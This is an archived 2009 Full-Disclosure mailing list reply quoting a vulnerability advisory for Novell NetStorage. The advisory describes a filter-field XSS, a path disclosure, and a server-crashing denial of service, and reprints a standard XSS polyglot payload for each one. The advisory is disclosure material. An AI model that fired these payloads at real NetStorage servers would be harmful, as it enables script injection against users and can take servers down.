lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <c83481820903261803m24cbb31ftec52223c1e3f9ed0@mail.gmail.com>
Date: Thu, 26 Mar 2009 21:03:59 -0400
From: Jeremy Brown <0xjbrown41@...il.com>
To: Bugs NotHugs <bugsnothugs@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: Novell Netstorage Multiple Vulnerabilities

I like you name, hehe.

On Thu, Mar 26, 2009 at 8:50 PM, Bugs NotHugs <bugsnothugs@...il.com> wrote:
> - Novell Netstorage Multiple Vulnerabilities
>
> - Description
>
> "Novell NetStorage acts as a bridge between a company's protected Novell network
> and the Internet, providing protected file access from any Internet
> location. Files
> and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise
> Server can be
> accessed using either a browser or via Network Neighborhood and Microsoft Web
> Folders; no Novell Client^Ù software is required. Users can securely
> access files
> from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure Hypertext
> Transfer Protocol (HTTPS)."
>
> Novell NetStorage contains a wide variety of vulnerabilities that may
> allow an attacker
> to cause a denial of service, gain configuration information or exploit other
> users of the application.
>
> #1 - Filter Field XSS
>
> The 'filter' field does not sanitize user-supplied input. An attacker
> could use this
> to carry out cross-site scripting attacks against other authenticated users.
>
>  ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
>
> #2 - Mail File Action Path Disclosure
>
> On a file list, if a user right clicks a file, chooses the 'mail'
> option and then
> pastes script code in any field, the application will produce an error message
> disclosing the installation path:
>
>  Paste the following script:
>
> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
> /SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
>
>  Resulting error:
>
>  OES:
>    'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag:
> expected "to" but got "SCRIPT"
>
>  Netware:
>    'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected
> "subject" but got "SCRIPT"
>
> #3 - File Attribute Malformed Input Server DoS
>
> When interacting with files, a user can right click on the file and click
> either 'NFS Info' or 'Netware Info'. Supplying script code into various fields
> will cause the Netware server to abend and lock up.
>
> Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES.
>
> The following script code causes the issue:
>
> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
> /SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
>
> - Product
>
> Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6
>
> - Solution
>
> None
>
> - Timeline
>
> 2008-06-06: Vulnerability Discovered
> 2008-07-07: Disclosed to Vendor (no ack)
> 2008-10-05: Re-sent to Vendor (no ack)
> 2009-03-26: Disclosed to Public (no more playing nice)
>
> --
>
> BugsNotHugs
> Shared Vulnerability Disclosure Account
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ